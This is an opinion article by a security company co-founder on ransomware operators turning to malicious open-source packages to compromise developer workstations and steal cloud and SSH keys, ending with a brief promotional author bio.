Ransomware Attackers Are Being Drawn To The Open-Source Ecosystem

By Pete Morgan, co-founder and CSO at Phylum

Ransomware continues to be a significant problem for companies worldwide. If you’re not entirely convinced, ask a non-techie if they’ve heard of ransomware, and you’ll likely at least get an affirmative nod. 

When discussing ransomware, I always like to preface it with the following: Ransomware is not an attack but rather an evolutionary step in monetizing the compromise of computers. Attackers used to steal payment card info and sell the stolen data to other attackers for use in carding schemes. Cryptocurrency and the ease by which an individual can buy cryptocurrency has made direct payment and obfuscation of payment data more accessible to attackers. Attackers have long had a myriad of methods to compromise computers. Still, the most effective way to turn those compromises into money is disabling access to systems and/or data by encrypting the most valuable assets and discarding the original. 

Chainalysis reported that ransomware attackers extorted an estimated $456.8 million from victims in 2022, down from $765.6 million the year before. This seemed like good news for security teams and could be seen as validation that the training, endpoint tools, and policies they put in place are working. But that is only half true. Ransomware is a business so effective that it has grown to offer services to other attackers in a service provider model. And just like any other business experiencing a loss of revenue, it only serves as motivation to adapt. Reduced revenue from existing attacks will not stop attackers from ransoming businesses; it will only change the tactics for how they conduct operations.

The last few months have seen record amounts of compromises ending in ransomware. Given the amount of money attackers are extracting from companies using these techniques, I think it’s safe to say ransomware isn’t going anywhere anytime soon. One area ripe for such attacks are software developer workstations. These workstations are not as commonly protected by endpoint defensive technology because often the process of software development can trigger false positives in endpoint defensive agents, and drastically slow down productivity for the developers in question. In addition, developers often have significantly more access to valuable resources than other types of employees, and the massive shift to remote work has made developers even higher value targets.

We have already begun to see malware authors include well-known ransomware binaries in their open-source package publications. They have been primitive methods so far, following a familiar publish and iterate pattern designed to refine their techniques and up their sophistication as they learn more about how vulnerable developers are and the assets they can ascertain. Attackers will quickly adapt beyond simply re-packaging existing ransomware binaries, develop more difficult-to-detect payloads in non-compiled languages to increase their effectiveness, and evade traditional detection methods. Combined with supply chain attacks such as dependency confusion, these attackers will be able to target victims with precision.

The open-source ecosystem is an enticing entry point to ransomware attackers both because it offers high-value data for lateral movement and because it is not well-defended. For example, instead of simply encrypting files, attackers can use malicious packages to access developer workstations containing secrets like AWS, SSH, GPG keys, signing keys, and access to source code. These secrets can then be used to mount much more damaging ransomware attacks. Using AWS keys, attackers can often influence or delete backups stored in the AWS cloud, making ransomware attacks much more effective. SSH keys are often used to authenticate users to other computers. Attackers gaining access to SSH keys can move laterally through a compromised organization, further understanding both defenses to evade, and targets to disable with a ransomware payload.

These attack TTPs have made it difficult to connect existing software supply chain attacks with ransomware outcomes. Attackers that successfully exfiltrate AWS or SSH keys will logically use that access to understand their victim for days, weeks or months before mounting further operations. This separation between access-gaining operations, and outcomes such as ransomware makes it challenging for defenders to understand the attack chain. It’s always easy to point at phishing, or unpatched vulnerabilities in modern complex computer networks. 

While organizations may have made progress in preventing traditional social engineering techniques, make no mistake: ransomware attacks are not going anywhere. They are just finding new ways to get in, and most organizations won’t see it coming. 

Author Bio

Peter is a security researcher with a long history in research and consulting organizations tied to some of the smartest people imaginable.

He is proud to have helped build a team composed of software developers and vulnerability researchers with over a decade of experience.

This background enabled Phylum to develop a truly next-generation product to protect our customers from the growing number of attacks against open-source software.